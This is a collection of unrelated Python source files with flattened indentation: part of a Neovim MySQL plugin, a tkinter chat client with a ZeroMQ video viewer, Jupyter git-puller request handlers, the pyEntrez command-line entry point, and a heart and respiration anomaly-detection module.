current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
# If there's no running query, ignore.
if not current_tab.status['executing']:
raise NvimMySQLError("No query is currently running in this tab")
current_tab.update_status(killing=True)
query_id = current_tab.conn.thread_id()
logger.debug("thread id: {}".format(query_id))
db_params = cxnstr.to_dict(current_tab.connection_string)
conn = pymysql.connect(use_unicode=True, **db_params)
try:
cursor = conn.cursor()
cursor.execute("kill query {}".format(query_id))
finally:
conn.close()
logger.debug("done killing query")
@pynvim.command('MySQLShowResults', nargs='*', sync=True)
def show_results(self, args):
"""Display the results buffer.
:MySQLShowResults <format> <tab_autoid>
Both arguments are optional, but format must be specified if tab_autoid
is specified.
        format can be one of 'table' (the default), 'csv', 'raw_column', or
        'vertical'.
        'table' is an ASCII table format, similar to the standard MySQL client.
        'csv' formats the result set as a CSV file.
        'raw_column' is a raw view of a single column (the first column, if the
        result set contains more than one). For a 1x1 result set, this format
        lets you see the raw data of a single data point, which can be helpful
        for long text fields and/or text fields with newlines. It's also useful
        for quickly extracting a list of field names from DESCRIBE output.
        'vertical' prints each row as a series of "field: value" lines, one
        field per line.
If tab_autoid is specified, only show the results if we are currently
in the MySQLTab with the given autoid. If tab_autoid is not specified,
show the results no matter what.
"""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
logger.debug("show_results args: {}".format(args))
if len(args) > 1:
tab_autoid = int(args[1])
else:
tab_autoid = None
if len(args) > 0:
format_ = args[0]
if format_ not in ['table', 'csv', 'raw_column', 'vertical']:
raise NvimMySQLError("Invalid results format '{}'".format(format_))
else:
format_ = 'table'
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
if tab_autoid is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
else:
return
# If we were called with a specific tab number and we're not in
# that tab, ignore.
if tab_autoid is not None and tab_autoid != current_tab.autoid:
return
current_tab.open_results_window()
if current_tab.query and (current_tab.status['results_pending'] or format_ != current_tab.results_format):
metadata = {
'query': current_tab.query,
'duration': current_tab.query_end - current_tab.query_start,
}
current_tab.results_buffer[:] = format_results(current_tab.results, format_, metadata)
current_tab.results_format = format_
self.vim.command("normal gg0")
current_tab.update_status(results_pending=False)
# If this was done automatically, switch back to wherever the user was.
if tab_autoid is not None:
self.vim.command('wincmd p')
@pynvim.command('MySQLFreezeResultsHeader', sync=True)
def freeze_results_header(self):
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
if current_tab.results_buffer != self.vim.current.buffer:
raise NvimMySQLError("This command can only be run in results buffer")
self.vim.feedkeys("""gg^:=winheight('%')-4
sp
L3jH^:se scb
k:se scb
:se sbo=hor
j""")
@pynvim.command('MySQLShowTree', sync=True)
def show_tree(self):
"""Display the tree buffer."""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
current_tab.open_tree_window()
current_tab.tree.refresh_data()
current_tab.tree_buffer[:] = current_tab.tree.render()
@pynvim.command('MySQLTreeToggleDatabase', sync=True)
def tree_toggle_database(self):
"""Open or close the nearest database in the tree."""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
if current_tab.tree_buffer != self.vim.current.buffer:
raise NvimMySQLError("This command can only be run in tree buffer")
database, expanded, row = nvim_mysql.util.get_parent_database_in_tree(
self.vim.current.buffer,
self.vim.current.window.cursor[0] - 1
)
if expanded:
current_tab.tree.close(database)
else:
current_tab.tree.open(database)
current_tab.tree.refresh_data()
current_tab.tree_buffer[:] = current_tab.tree.render()
self.vim.current.window.cursor = [row + 1, 0]
@pynvim.function('MySQLComplete', sync=True)
def complete(self, args):
findstart, base = args
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
# If this isn't a MySQL tab, ignore.
if current_tab is None:
return 0 if findstart else []
return current_tab.complete(findstart, base)
@pynvim.autocmd('TabClosed', sync=True)
def cleanup_tabs_on_tabclosed(self):
if self.initialized:
self.cleanup_tabs()
def cleanup_tabs(self):
logger.debug("number of open tabs: {}".format(len(self.vim.tabpages)))
for nvim_tab, mysql_tab in list(self.tabs.items()):
if nvim_tab not in self.vim.tabpages:
logger.debug("tab w/ handle {} is not longer open. closing.".format(nvim_tab.handle))
mysql_tab.close()
del self.tabs[nvim_tab]
@pynvim.autocmd('WinEnter', sync=True)
def auto_close_aux_windows_on_winenter(self):
"""Close remaining windows in tab when all are disposable."""
if self.initialized:
def closeable(window):
auto_close_results = bool(self.get_option('auto_close_results'))
is_results_window = window.buffer == current_tab.results_buffer
is_tree_window = window.buffer == current_tab.tree_buffer
return (auto_close_results and is_results_window) or is_tree_window
tabpage = self.vim.current.tabpage
current_tab = self.tabs.get(tabpage, None)
if current_tab is not None:
if all(closeable(w) for w in tabpage.windows):
for _ in range(len(tabpage.windows)):
self.vim.command('q')
# We have to call this manually because the TabClosed
# autocommand doesn't appear to be called when using
# vim.command.
self.cleanup_tabs()
def _initialize(self):
logger.debug("initializing plugin")
self.initialized = True
tabline_file = os.path.join(os.path.dirname(__file__), 'tabline.vim')
self.vim.command('source {}'.format(tabline_file))
# Set up autocomplete
self.vim.command('set completefunc=MySQLComplete')
self.refresh_tabline()
if self.get_option('use_spinner'):
self.start_spinner()
logger.debug("plugin initialized")
def refresh_tabline(self, spinner_char=None):
if spinner_char:
self.vim.vars['nvim_mysql#spinner_char'] = spinner_char
self.vim.command('set showtabline=2 tabline=%!MySQLTabLine()')
def start_spinner(self):
def spin():
i = 0
while True:
i = i % len(SPINNER_CHARS)
self.vim.async_call(self.refresh_tabline, SPINNER_CHARS[i])
time.sleep(.1)
i += 1
t = threading.Thread(target=spin)
t.daemon = True
t.start()
class Tree(object):
"""Internal representation of tree view."""
def __init__(self, tab):
self.tab = tab
self.data = {} # {db: {expanded: bool, objects: [str]}}
def refresh_data(self):
cursor = self.tab.conn.cursor()
cursor.execute("show databases")
databases = [r[0] for r in cursor.fetchall()]
# Remove databases that are no longer listed
        for database in list(self.data):
if database not in databases:
del self.data[database]
# Add new databases
for database in databases:
if database not in self.data:
self.data[database] = {'expanded': False, 'objects': []}
# Update objects for expanded databases
for database in self.data:
if self.data[database]['expanded']:
cursor.execute("show tables from {}".format(database))
tables = [r[0] for r in cursor.fetchall()]
self.data[database]['objects'] = tables
def open(self, database):
self.data[database]['expanded'] = True
def close(self, database):
self.data[database]['expanded'] = False
def render(self):
s = ''
for database in sorted(self.data):
s += database
s += u' ▾' if self.data[database]['expanded'] else u' ▸'
s += '\n'
if self.data[database]['expanded']:
s += ' ' + '\n '.join(self.data[database]['objects']) + '\n'
return s.splitlines()
|
main_client.py
|
import tkinter
import socket
from threading import Thread
import cv2
import zmq
import base64
import numpy as np
IP = ""
PORT = 0
class Viewer:
context = zmq.Context()
footage_socket = context.socket(zmq.SUB)
def __init__(self):
self.footage_socket.connect('tcp://'+IP+':5555')
        self.footage_socket.setsockopt_string(zmq.SUBSCRIBE, '')
def video(self):
while True:
try:
frame = self.footage_socket.recv_string()
img = base64.b64decode(frame)
                npimg = np.frombuffer(img, dtype=np.uint8)
source = cv2.imdecode(npimg, 1)
cv2.imshow("Stream", source)
cv2.waitKey(1)
except KeyboardInterrupt:
cv2.destroyAllWindows()
break
def run(self):
        videoThread = Thread(target=self.video)
        videoThread.daemon = True
videoThread.start()
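# The Viewer above assumes a publisher that PUBlishes base64-encoded JPEG frames on
# port 5555. A minimal sketch of such a sender (hypothetical, not part of this client):
#   context = zmq.Context()
#   pub = context.socket(zmq.PUB)
#   pub.bind('tcp://*:5555')
#   ok, buf = cv2.imencode('.jpg', frame)             # frame from cv2.VideoCapture
#   pub.send_string(base64.b64encode(buf).decode())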
def recv_message(sock):
while True:
msg = sock.recv(1024)
chat_list.insert(tkinter.END, msg.decode())
chat_list.see(tkinter.END)
def connect(event=None):
global IP, PORT
connect_string = input_string.get()
addr = connect_string.split(":")
IP = addr[0]
PORT = int(addr[1])
w_connect.destroy()
def send_message(event=None):
msg = input_msg.get()
sock.send(msg.encode())
input_msg.set("")
if msg == "/bye":
sock.close()
window.quit()
# Connection window
w_connect = tkinter.Tk()
w_connect.title("접속대상")
tkinter.Label(w_connect, text="접속대상").grid(row = 0, column = 0)
input_string = tkinter.StringVar(value="127.0.0.1:10000")
input_addr = tkinter.Entry(w_connect, textvariable=input_string, width=20)
input_addr.grid(row=0, column=1, padx=5, pady=5)
c_button = tkinter.Button(w_connect, text="접속하기",command=connect)
c_button.grid(row=0, column= 2, padx=5, pady=5)
width = 280
height = 45
screen_width = w_connect.winfo_screenwidth()  # get the screen resolution
screen_height = w_connect.winfo_screenheight()
x = int((screen_width / 2) - (width / 2))  # compute coordinates that center the window on screen
y = int((screen_height / 2) - (height / 2))
w_connect.geometry('{}x{}+{}+{}'.format(width, height, x, y))  # set the position the window opens at
w_connect.mainloop()
# Chat window
window = tkinter.Tk()
window.title("클라이언트")
cg_frame = tkinter.Frame(window)
scroll = tkinter.Scrollbar(cg_frame)
scroll.pack(side=tkinter.RIGHT, fill=tkinter.Y)
chat_list = tkinter.Listbox(cg_frame, height=15, width=50, yscrollcommand= scroll.set)
chat_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH, padx=5, pady=5)
cg_frame.pack()
input_msg = tkinter.StringVar()
inputbox = tkinter.Entry(window, textvariable=input_msg)
inputbox.bind("<Return>", send_message)
inputbox.pack(side=tkinter.LEFT, fill=tkinter.BOTH, expand=tkinter.YES, padx=5, pady=5)
send_button = tkinter.Button(window, text="전송",command=send_message)
send_button.pack(side=tkinter.RIGHT, fill=tkinter.X, padx=5, pady=5)
# Socket creation and receiver thread startup
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((IP, PORT))
th = Thread(target=recv_message, args=(sock,))
th.daemon = True
th.start()
watch = Viewer()
watch.run()
window.mainloop()
|
handlers.py
|
from tornado import gen, web, locks
import traceback
import urllib.parse
from notebook.base.handlers import IPythonHandler
import threading
import json
import os
from queue import Queue, Empty
import jinja2
from .pull import GitPuller
from .version import __version__
class SyncHandler(IPythonHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# We use this lock to make sure that only one sync operation
# can be happening at a time. Git doesn't like concurrent use!
if 'git_lock' not in self.settings:
self.settings['git_lock'] = locks.Lock()
@property
def git_lock(self):
return self.settings['git_lock']
@gen.coroutine
def emit(self, data):
if type(data) is not str:
serialized_data = json.dumps(data)
if 'output' in data:
self.log.info(data['output'].rstrip())
else:
serialized_data = data
self.log.info(data)
self.write('data: {}\n\n'.format(serialized_data))
yield self.flush()
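    # emit() writes one server-sent-events message per call. For example (sketch,
    # values are illustrative), emit({'phase': 'syncing', 'output': 'Fetching...'})
    # sends the single line
    #   data: {"phase": "syncing", "output": "Fetching..."}
    # followed by a blank line, which a browser-side EventSource parses as one event.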
@web.authenticated
@gen.coroutine
def get(self):
try:
yield self.git_lock.acquire(1)
except gen.TimeoutError:
self.emit({
'phase': 'error',
                'message': 'Another git operation is currently running; try again in a few minutes'
})
return
try:
repo = self.get_argument('repo')
branch = self.get_argument('branch', None)
depth = self.get_argument('depth', None)
if depth:
depth = int(depth)
# The default working directory is the directory from which Jupyter
# server is launched, which is not the same as the root notebook
# directory assuming either --notebook-dir= is used from the
# command line or c.NotebookApp.notebook_dir is set in the jupyter
# configuration. This line assures that all repos are cloned
# relative to server_root_dir/<optional NBGITPULLER_PARENTPATH>,
# so that all repos are always in scope after cloning. Sometimes
# server_root_dir will include things like `~` and so the path
# must be expanded.
repo_parent_dir = os.path.join(os.path.expanduser(self.settings['server_root_dir']),
os.getenv('NBGITPULLER_PARENTPATH', ''))
repo_dir = os.path.join(repo_parent_dir, self.get_argument('targetpath', repo.split('/')[-1]))
            # We're going to send out event streams!
self.set_header('content-type', 'text/event-stream')
self.set_header('cache-control', 'no-cache')
gp = GitPuller(repo, repo_dir, branch=branch, depth=depth, parent=self.settings['nbapp'])
q = Queue()
def pull():
try:
for line in gp.pull():
q.put_nowait(line)
# Sentinel when we're done
q.put_nowait(None)
except Exception as e:
q.put_nowait(e)
raise e
self.gp_thread = threading.Thread(target=pull)
self.gp_thread.start()
while True:
try:
progress = q.get_nowait()
except Empty:
yield gen.sleep(0.5)
continue
if progress is None:
break
if isinstance(progress, Exception):
self.emit({
'phase': 'error',
'message': str(progress),
'output': '\n'.join([
line.strip()
for line in traceback.format_exception(
type(progress), progress, progress.__traceback__
)
])
})
return
self.emit({'output': progress, 'phase': 'syncing'})
self.emit({'phase': 'finished'})
except Exception as e:
self.emit({
'phase': 'error',
'message': str(e),
'output': '\n'.join([
line.strip()
for line in traceback.format_exception(
type(e), e, e.__traceback__
)
])
})
finally:
self.git_lock.release()
class UIHandler(IPythonHandler):
def initialize(self):
super().initialize()
# FIXME: Is this really the best way to use jinja2 here?
# I can't seem to get the jinja2 env in the base handler to
# actually load templates from arbitrary paths ugh.
jinja2_env = self.settings['jinja2_env']
jinja2_env.loader = jinja2.ChoiceLoader([
jinja2_env.loader,
jinja2.FileSystemLoader(
os.path.join(os.path.dirname(__file__), 'templates')
)
])
@web.authenticated
@gen.coroutine
def get(self):
app_env = os.getenv('NBGITPULLER_APP', default='notebook')
repo = self.get_argument('repo')
branch = self.get_argument('branch', None)
depth = self.get_argument('depth', None)
urlPath = self.get_argument('urlpath', None) or \
self.get_argument('urlPath', None)
subPath = self.get_argument('subpath', None) or \
self.get_argument('subPath', '.')
app = self.get_argument('app', app_env)
parent_reldir = os.getenv('NBGITPULLER_PARENTPATH', '')
targetpath = self.get_argument('targetpath', None) or \
self.get_argument('targetPath', repo.split('/')[-1])
if urlPath:
path = urlPath
else:
path = os.path.join(parent_reldir, targetpath, subPath)
if app.lower() == 'lab':
path = 'lab/tree/' + path
elif path.lower().endswith('.ipynb'):
path = 'notebooks/' + path
else:
path = 'tree/' + path
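        # Examples of the resulting redirect path (illustrative values):
        #   app='notebook', targetpath='myrepo', subPath='index.ipynb'
        #       -> 'notebooks/myrepo/index.ipynb'
        #   app='lab', targetpath='myrepo', subPath='.'
        #       -> 'lab/tree/myrepo/.'
        #   urlpath='lab/tree/foo.ipynb' takes precedence and is used as-is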
self.write(
self.render_template(
'status.html',
repo=repo, branch=branch, path=path, depth=depth, targetpath=targetpath, version=__version__
))
self.flush()
class LegacyGitSyncRedirectHandler(IPythonHandler):
@web.authenticated
@gen.coroutine
def get(self):
new_url = '{base}git-pull?{query}'.format(
base=self.base_url,
query=self.request.query
)
self.redirect(new_url)
class LegacyInteractRedirectHandler(IPythonHandler):
@web.authenticated
@gen.coroutine
def get(self):
repo = self.get_argument('repo')
account = self.get_argument('account', 'data-8')
repo_url = 'https://github.com/{account}/{repo}'.format(account=account, repo=repo)
query = {
'repo': repo_url,
# branch & subPath are optional
'branch': self.get_argument('branch', 'gh-pages'),
'subPath': self.get_argument('path', '.')
}
new_url = '{base}git-pull?{query}'.format(
base=self.base_url,
query=urllib.parse.urlencode(query)
)
self.redirect(new_url)
|
cmdline.py
|
"""Main entry-point into pyEntrez, handling cmdline args and initializing prompt or TUI service.
When the script is started the user will be checked against the local user file; if they are a first-time
user they will go through new user creation via the user_cred module and then return. If they
are a returning user their settings file will be loaded and a configargparser will be created. The
cmdline arguments are contained within the pyentrez.utils.variables module, where new arguments can
be added or removed. All settings in variables module are added to the users environment. Finally,
after parsing args either the prompt or TUI environment will initialize.
py-cui is extended in this module for the purpose of hooking into their resize-refresh activity
with a threaded monitor. This hook calls for all text containing widgets to update their text-
wrappers and to refresh.
"""
import threading
import time
# configparser Library
from pathlib import Path
from typing import Any, Optional, Tuple
import attr
import configargparse
# Py_CUI Library
import py_cui
from configargparse import ArgumentParser, argparse
# Logger
from loguru import logger
import pyentrez
from pyentrez import exceptions
from pyentrez.main import cmd_entrez, entrez_manager
from pyentrez.main import user_cred as uc
from pyentrez.utils import envars as ev
from pyentrez.utils import string_utils as su
from pyentrez.utils import variables as vl
cuxy: Tuple[int, int] = (5, 4)
# noinspection PyPep8Naming
class MyCUI(py_cui.PyCUI):
"""Extension of PyCUI for hooking into _refresh_height_width
PyCui has a built in resize handler from curses, which calls for all widgets to refresh their
terminal character height and width. There was no built-in functionality for resizing string
contained within those widgets. This class extension provides a hook by passing in the instanced
EntrezManager and calling for text_wrapping whenever _refresh_height_width is called.
Since py_cui checks and calls refreshes several times per second if the user is still resizing
their terminal, a thread is started to monitor for refresh calls, instead of calling each time.
The threaded call sets a progress bool to true that prevents new threads from being started
until this one is complete. The thread takes a short sleep, and then calls for EntrezManager
to call its refresh method with the latest height and width values.
Args:
        num_rows (int): number of rows
        num_cols (int): number of columns
        **kwargs (Dict[str, Any]): All other arguments required by the parent.
Attributes:
lowermanager: Instance of EntrezManager
timing: bool to prevent multiple refresh monitor threads
"""
def __init__(self, num_rows, num_cols, **kwargs):
super().__init__(num_rows, num_cols, **kwargs)
self.lowermanager: Optional[Any] = None
self.thread: Optional[Any] = None
self.timing = False
# Start of pyEntrez-extended code ----------------------------
def start_time(self):
"""Only start a new thread once per time interval by setting a timing checkpoint."""
if not self.timing:
self.timing = True
self.thread = threading.Thread(target=self.timer, args=())
self.thread.start()
def timer(self):
"""On a new thread, when called sleep, and then call for EntrezManager to refresh."""
assert self.lowermanager is not None
time.sleep(0.05)
self.lowermanager.refresh_h_w()
self.timing = False
def _refresh_height_width(self, height, width):
"""Function that updates the height and width of the CUI based on terminal window size
Args:
height (int): Window height in terminal characters
width (int):Window width in terminal characters
"""
if self.lowermanager is not None:
self.start_time()
# End of pyEntrez-extended code ----------------------------
self._height = height
self._width = width
self._grid.update_grid_height_width(self._height, self._width)
for widget_id in self._widgets.keys():
self._widgets[widget_id].update_height_width()
if self._popup is not None:
self._popup.update_height_width()
@attr.s(slots=True)
class GetParser(object):
"""Create a parser using the settings defined in the variables module.
"""
path = attr.ib()
args = attr.ib()
@classmethod
def get_parser(cls) -> Any: # noqa: WPS213
"""Check if new user and then create argparser.
Function will run check_new() function to check if this is user's
first time using the script, and if it is a settings directory will
be created and a copy of the default config copied to it.
Additionally, the new user will be added to the core_config.yaml file,
with a path to the user's my_settings.yaml file.
ConfigArgParser allows for setting default config paths and will
check defaults>user_settings>envar.
User can also pass --INIT arg to create a new workspace.
Settings in pyentrez.utils.variables are formatted as follows:
APPSETTING = [
{
'args': ['-c', '--credentials'],
'kwargs': {
'action': 'store_true',
'default': False,
'help': 'Allow user to set DB credentials on application start.',
},
'setting': {'envar': <envar>, 'text': <text>}
},
...
        Returns:
            A GetParser instance holding:
            the parsed arguments generated from the settings defined in
            pyentrez.utils.variables, and
            the os-agnostic Path to the user's workspace directory.
"""
path = uc.check_new()
parse = configargparse.ArgParser(
default_config_files=[
path / 'my_settings.yaml',
],
formatter_class=argparse.MetavarTypeHelpFormatter,
add_env_var_help=False,
add_config_file_help=False,
auto_env_var_prefix=None,
description='''
pyEntrez can be run as a TUI or from the command line. Args that start
with "--" (eg. --version) can also be set in a config file. The config file
uses YAML syntax and must represent a YAML "mapping" (for details, see
http://learn.getgrav.org/advanced/yaml). If an arg is specified in more
than one place, then commandline values override config file values
which override defaults.
''')
menu = vl.get_settings()
for organization in menu.values():
for setting in organization:
                if 'args' in setting and 'kwargs' in setting:
parse.add(*setting['args'], **setting['kwargs'])
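        # For the APPSETTING example shown in the docstring above, the loop ends up
        # calling roughly (sketch):
        #   parse.add('-c', '--credentials', action='store_true', default=False,
        #             help='Allow user to set DB credentials on application start.')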
args = parse.parse_args()
args = vars(args)
return cls(path, args)
@attr.s
class CLI(object):
"""CLI instance parses args and controls entry into the application.
Attributes:
self.version: version of pyentrez.
self.copyright: copyright string.
self.catastrophic_failure: whether or not a catastrophic_failure has been raised.
self.args: args passed from commandline.
"""
version: str = attr.ib(default=pyentrez.__version__)
copyright: str = attr.ib(default=pyentrez.__copyright__)
catastrophic_failure: bool = attr.ib(default=False)
args: Any = attr.ib(init=False)
def initialize(self):
"""Get a parser, set the args, and set Home path."""
parser = GetParser.get_parser()
self.args = parser.args
self.args['Home'] = parser.path
def run_pyentrez(self):
"""Handles application behavior based on parsed args.
If version is true it prints version info and then raises a normal SystemExit, which
allows application to shut down.
If INIT is true it takes the user through creation by calling UserCred's first_run.
Otherwise it calls envars to add all args to envars and then determines whether to start
pyentrez in TUI-mode or interactive cmd prompt.
"""
if self.args['version']:
print(f'pyentrez - {self.version}')
print(self.copyright)
raise SystemExit(self.catastrophic_failure)
elif self.args['INIT']:
logger.debug('User making a new workspace.')
uc.first_run()
else:
pyentrez.configure_logger(self.args['verbose'], self.args['output'])
ev.setenv(self.args)
if self.args['TUI'] == 'on':
logger.info('Starting in TUI mode')
self.starttui()
else:
logger.info('Starting in interactive cmd mode')
self.notui()
def notui(self) -> None:
"""Initialize application in commandline prompt mode."""
tui = cmd_entrez.CommandEntrez()
tui.start()
def starttui(self) -> None:
"""Initiate script in TUI mode.
Initialize pyCUI root and the EntrezManager. All config settings have been saved to envars
earlier in script. We use our extended myCUI class to hook into py_cui's resize refresh.
"""
root = MyCUI(cuxy[0], cuxy[1])
root.toggle_unicode_borders()
em = entrez_manager.EntrezManager(root) # noqa: F841
        root.lowermanager = em
root.start()
def clean_exit(self) -> None:
"""Provides a clean exit with logging and file closing."""
logger.info('Exiting pyEntrez.')
logger.info('-----------------------------------------------------')
raise SystemExit(self.catastrophic_failure)
def _run(self):
"""Abstraction to make sure application is only run if a CLI instance calls execute."""
self.initialize()
self.run_pyentrez()
@logger.catch
def execute(self) -> None:
"""Entry point into our script that instances a parser and then selects start behavior.
Instance a configargparser and check if user is new or existing. Parse the returned args
and determine if full initialization is taking place or if we are creating a new user or
returning version info. If initialization of application is requested, call for all setting
arguments to be loaded to envars and either start application in cmd-prompt or TUI mode.
Args that effect start behavior:
--INIT: Allows existing user to create a new workspace directory.
--version: Prints pyentrez version info and exits the application.
--TUI <on|off): Run application in TUI mode if 'on', or in cmd-prompt mode if 'off'
"""
try:
self._run()
except exceptions.CleanExit as exc:
self.clean_exit()
except KeyboardInterrupt as exc:
print('... stopped')
logger.critical(f'Caught keyboard interrupt from user:{exc}')
self.catastrophic_failure = True
except exceptions.ExecutionError as exc:
logger.critical(f'There was a critical error during execution of pyEntrez: {exc}')
print(f'There was a critical error during execution of pyEntrez: {exc}')
self.catastrophic_failure = True
except exceptions.EarlyQuit:
logger.critical('... stopped while processing files')
print("... stopped while processing files")
self.catastrophic_failure = True
|
anomaly_detector.py
|
from __future__ import division, print_function
from threading import Thread
import os
import ConfigParser
import logging
import numpy as np
import pandas as pd
from atrial_fibrillation import AtrialFibrillation
from ventricular_tachycardia import VentricularTachycardia
from apc_pvc_helper import APC_helper
from pvc_hamilton import PVC
from respiration_AD import RespiratoryAD
from sleep_AD import SleepAD
__author__ = "Dipankar Niranjan, https://github.com/Ras-al-Ghul"
# Logging config
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)
class AnomalyDetector(object):
"""
implements methods to call various Anomaly Detection Algorithms
"""
def __init__(self):
self.config = ConfigParser.RawConfigParser()
dirname = os.path.dirname(os.path.realpath(__file__))
cfg_filename = os.path.join(dirname, 'anomaly_detector.cfg')
self.config.read(cfg_filename)
self.window_size =\
self.config.getint('Atrial Fibrillation', 'window_size')
self.vt_result = None
def af_anomaly_detect(self, rr_intervals, hr_quality_indices):
"""
executes the Atrial Fibrillation Anomaly detection
Input:
rr_intervals: a 2D pandas dataframe -
(refer rrinterval.txt from Hexoskin record)
first column named "hexoskin_timestamps" -
contains 'int' timestamps
second column named as "rr_int" -
contains 'double' interval data
hr_quality_indices: a 2D pandas dataframe -
(refer hr_quality.txt from Hexoskin record)
first column named "hexoskin_timestamps" -
                contains 'int' timestamps
second column named as "quality_ind" -
contains 'int' quality indices,
with max value 127
Output:
returns:
if anomaly:
                'dict' with the following keys:
start_hexo_timestamp: an integer denoting timestamp of
the first record
end_hexo_timestamp: an integer denoting timestamp of
32/64/128 - last record
num_of_NEC: a small integer, higher the number,
more severe the anomaly here
data_reliability: a small integer, which denotes as a
percentage, the quality of the data
in this window
                                  the higher the percentage, the worse
                                  the quality
window_size: a small integer, takes 32/64/128
as values
else:
None
Notes:
based on 'A Simple Method to Detect
Atrial Fibrillation Using RR Intervals'
by Jie Lian et. al.
Note the return value (if not 'None') and
check with the data_reliability and previous
data timestamps to set AFAlarmAttribute at
the health_monitor server
"""
        if len(rr_intervals) != self.window_size:
            raise ValueError("window length of rr_intervals "
                             "passed doesn't match config file")
if not (rr_intervals['hexoskin_timestamps'][0] >=
hr_quality_indices['hexoskin_timestamps'][0] and
rr_intervals['hexoskin_timestamps'][len(rr_intervals)-1] <=
hr_quality_indices
['hexoskin_timestamps'][len(hr_quality_indices)-1]):
pass
# raise ValueError("first rr_interval timestamp\
# and last rr_interval timestamp must lie within first \
# and last timestamp of hr_quality")
AF = AtrialFibrillation(rr_intervals, hr_quality_indices,
self.config)
return AF.get_anomaly()
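    # Sketch of a possible anomalous return value, based on the docstring above
    # (the concrete numbers are made up for illustration):
    #   {'start_hexo_timestamp': 383021140185, 'end_hexo_timestamp': 383021150000,
    #    'num_of_NEC': 5, 'data_reliability': 10, 'window_size': 64}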
def vt_anomaly_detect(self, ecg, rr_intervals,
rr_interval_status, prev_ampl):
"""
creates an object and calls the Ventricular Tachycardia
anomaly detection methods
Input:
ecg: a 2D pandas dataframe -
(refer ecg.txt from Hexoskin record)
first column named "hexoskin_timestamps" -
contains 'int' timestamps
second column named as "ecg_val" -
contains 'int' raw ecg data
rr_intervals: a 2D pandas dataframe -
(refer rrinterval.txt from Hexoskin record)
first column named "hexoskin_timestamps" -
contains 'int' timestamps
second column named as "rr_int" -
contains 'double' interval data
            rr_interval_status: a 2D pandas dataframe -
(refer rrintervalstatus from Hexoskin API)
first column named "hexoskin_timestamps" -
                contains 'int' timestamps
second column named as "rr_status" -
contains 'int' quality indices.
Output:
sets:
vt_result: this is an attribute of an object of this
(Anomaly Detector) class. Its value can
be read from the caller method. Its value
is set to __zero_one_count which is
described next.
            __zero_one_count - if it is the boolean True, it means
that analysis of next 6 seconds is
required
- if it is False, it means that next 6
second analysis is not required
- if it has an integer value then it
means that a VT event has been detected
and it has to be stored in the anomaly
database and of course next 6 second
analysis is required
Notes:
based on the following three papers:
'Ventricular Tachycardia/Fibrillation Detection
Algorithm for 24/7 Personal Wireless Heart Monitoring'
by Fokkenrood et. al.
'Real Time detection of ventricular fibrillation
and tachycardia' by Jekova et. al.
'Increase in Heart Rate Precedes Episodes of
Ventricular Tachycardia and Ventricular
            Fibrillation in Patients with Implantable
            Cardioverter Defibrillators: Analysis of
Spontaneous Ventricular Tachycardia Database'
by Nemec et. al.
Refer to readme for more details
"""
__zero_one_count = True
VTobj = VentricularTachycardia(ecg, rr_intervals,
rr_interval_status, self.config)
further_analyze = VTobj.analyze_six_second()
# if initial analysis indicates that further analysis
# is not required
        if not further_analyze:
            __zero_one_count = False
            self.vt_result = __zero_one_count
            return
        logging.info("Doing further analysis")
# perform the preprocessing
VTobj.signal_preprocess()
# call the DangerousHeartActivity detector
cur_ampl, stop_cur = VTobj.DHA_detect(prev_ampl)
        # whatever the results of the following stages are, the next six-second
        # epoch necessarily has to be analyzed; if the DHA detector indicates that
        # further analysis of the current epoch is not required, record the result
        # and stop here
        if stop_cur is True:
            self.vt_result = __zero_one_count
            return
# asystole detector
vtvfres = VTobj.asystole_detector(cur_ampl)
# to analyze next six second epoch
if vtvfres == 'VT/VF':
# A VT episode has been found
logging.info("%s" % str(vtvfres))
__zero_one_count = VTobj.zero_one_count
self.vt_result = __zero_one_count
else:
# not a VT episode
logging.info("%s" % str(vtvfres))
self.vt_result = __zero_one_count
def apc_pvc(self, init_timestamp):
"""
this is only for testing and reference purpose,
in actuality, create APC_helper object and call
directly - no need to create AD object for this
Input:
timestamp: the first timestamp
Output:
stores to the results dict of the APC class
Notes:
based on the following paper:
'Automatic detection of premature atrial
contractions in the electrocardiogram'
by Krasteva et. al.
Refer to readme for more details
"""
apcHelperObj = APC_helper()
apcHelperObj.populate_DS()
apcHelperObj.popluate_aux_structures(init_timestamp)
apcHelperObj.apcObj.absolute_arrhythmia()
def pvc_Hamilton(self, init_timestamp):
"""
this is only for testing and reference purpose,
in actuality, create PVC object and call
directly - no need to create AD object for this
Input:
timestamp: the first timestamp
Output:
stores to the results dict of the PVC class
Notes:
based on:
'Open Source ECG Analysis Software
Documentation'
by Patrick S. Hamilton
Refer to readme for more details
"""
pvcObj = PVC()
pvcObj.populate_data()
pvcObj.beat_classf_analyzer(init_timestamp)
def resp_AD(self, init_timestamp):
"""
this is only for testing and reference purpose,
in actuality, create RespiratoryAD object and call
directly - no need to create AD object for this
Input:
timestamp: the first timestamp
Output:
stores to the results dict of the RespiratoryAD class
Notes:
based on:
'http://wps.prenhall.com/wps/media/objects\
/2791/2858109/toolbox/Box15_1.pdf'
Refer to readme for more details
"""
respObj = RespiratoryAD(self.config, init_timestamp)
th1 = Thread(target=respObj.populate_DS, args=[])
th1.start()
th1.join()
th2 = Thread(target=respObj.tidal_volume_anomaly, args=[])
th2.start()
th3 = Thread(target=respObj.minute_ventilation_anomaly, args=[])
th3.start()
th4 = Thread(target=respObj.resp_variation, args=[])
th4.start()
th5 = Thread(target=respObj.resp_classf, args=[])
th5.start()
